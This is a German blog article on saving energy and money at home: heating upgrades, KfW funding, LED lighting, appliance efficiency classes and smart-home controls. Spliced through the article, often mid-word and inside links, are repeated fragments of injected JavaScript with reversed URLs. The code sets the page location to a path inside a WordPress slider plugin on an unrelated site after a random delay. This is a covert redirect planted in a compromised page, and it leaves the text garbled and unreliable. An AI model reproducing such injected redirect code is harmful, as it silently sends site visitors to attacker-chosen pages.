Energie und Geld sparen – so geht’s

Umweltverträglichkeit und Sparsamkeit werden immer wichtiger. Nicht nur, um die negativen Auswirkungen unseres Hdoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andelns auf den Zustdoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and unseres Planeten zu reduzieren, sondern auch um zu sparen. Denn: Die Energiekosten doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and/belastung-fuer-verbraucher-energiekosten-steigen-auf-rekordniveau/8662534.html“ target=“_blank“>haben ein neues Rekordniveau erreicht. Das belastet vor allem die Finanzen der Hausbesitzer, da die Heizkosten einen Großteil der Energiekosten ausmachen.

Die richtigen Geräte

Zwischen 70 und 90% des Gesamtenergieverbrauchs von einem Haus entfallen auf die Heizenergie. Wer noch eine veraltete Heizung hat, kann durch eine Investition in ein neues Modell große Einsparungen erzielen. Eine energieeffiziente Sanierung des Eigenheims hat einen ähnlichen Effekt. Dabei müssen Eigentümer die Kosten für die Maßnahmen nicht komplett selbst stemmen. Die Kreditanstalt für Wiederaufbau (KfW) bietet doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andsfoerderung/Privatpersonen/Bestdoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andsimmobilien/“ target=“_blank“>Zuschüsse und günstige Förderkredite für solche Vorhaben an.

Doch auch der Stromverbrauch ist ein wichtiger Fakdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor bei den Energiekosten. In Deutschldoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and gibt es die höchsten Strompreise innerhalb der EU. Bis 2025 könnten sie nochmalig um 70% steigen.

Im Hinblick auf die Beleuchtung sind led lampen Energiesparlampen vorzuziehen – sie halten länger und verbrauchen weniger Energie. Wissenswertes über LEDs haben wir hier zusammengestellt.

Zusätzlich sollte bei der Neuanschaffung aller elektrischen Geräte auf die Energieeffizienzklasse geachtet werden – Insbesondere bei Stromfressern wie Kühlschränken oder Geschirrspülmaschinen wirkt sich die Energieeffizienzklasse merklich auf die Stromrechnung aus. Die Kennzeichnung reicht von G (besonders ineffizient) bis A+++ (besonders effizient). Als Faustregel gilt: Alles, was schlechter als mit A+ bewertet ist, ist keine gute Anschaffung. Auch wenn effizientere Geräte etwas teurer sind: Auf lange Sicht spart man bares Geld.

Das Haus hilft mit Energie zu sparen

Die energieeffizientesten Geräte helfen allerdings wenig, wenn sie unnötig Energie verbrauchen, etwa wenn bei offenem Fenster geheizt wird oder das Licht brennt, obwohl niemdoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and zu Hause ist. Abhilfe schaffen hier Smart-Home-Systeme. Durch den Einsatz von Sensoren wird zum Beispiel die Raumtemperatur gemessen und überprüft, ob Fenster geöffnet sind. Ist letzteres der Fall, startet die Heizung nicht. Ebenso lässt sich die gewünschte Temperatur für jeden Raum individuell regeln.

Intelligente Steckdosen und Stromschalter helfen beim Stromsparen. Eine Zusammenfassung darüber, was ein Smart-Home-System leisten kann und wie man Energie spart, ist auf der Seite von CosmosDirekt zu lesen.

Energie zu sparen, ist nicht aufwendig und sowohl kleine als auch große Investitionen führen mittel- und langfristig zu mehr Geld im Portemonnaie – Energiebewusst zu leben, lohnt sich.

0 Kommentare

Dein Kommentar

An Diskussion beteiligen?
Hinterlasse uns Deinen Kommentar!

Schreiben Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahren Sie mehr darüber, wie Ihre Kommentardaten verarbeitet werden .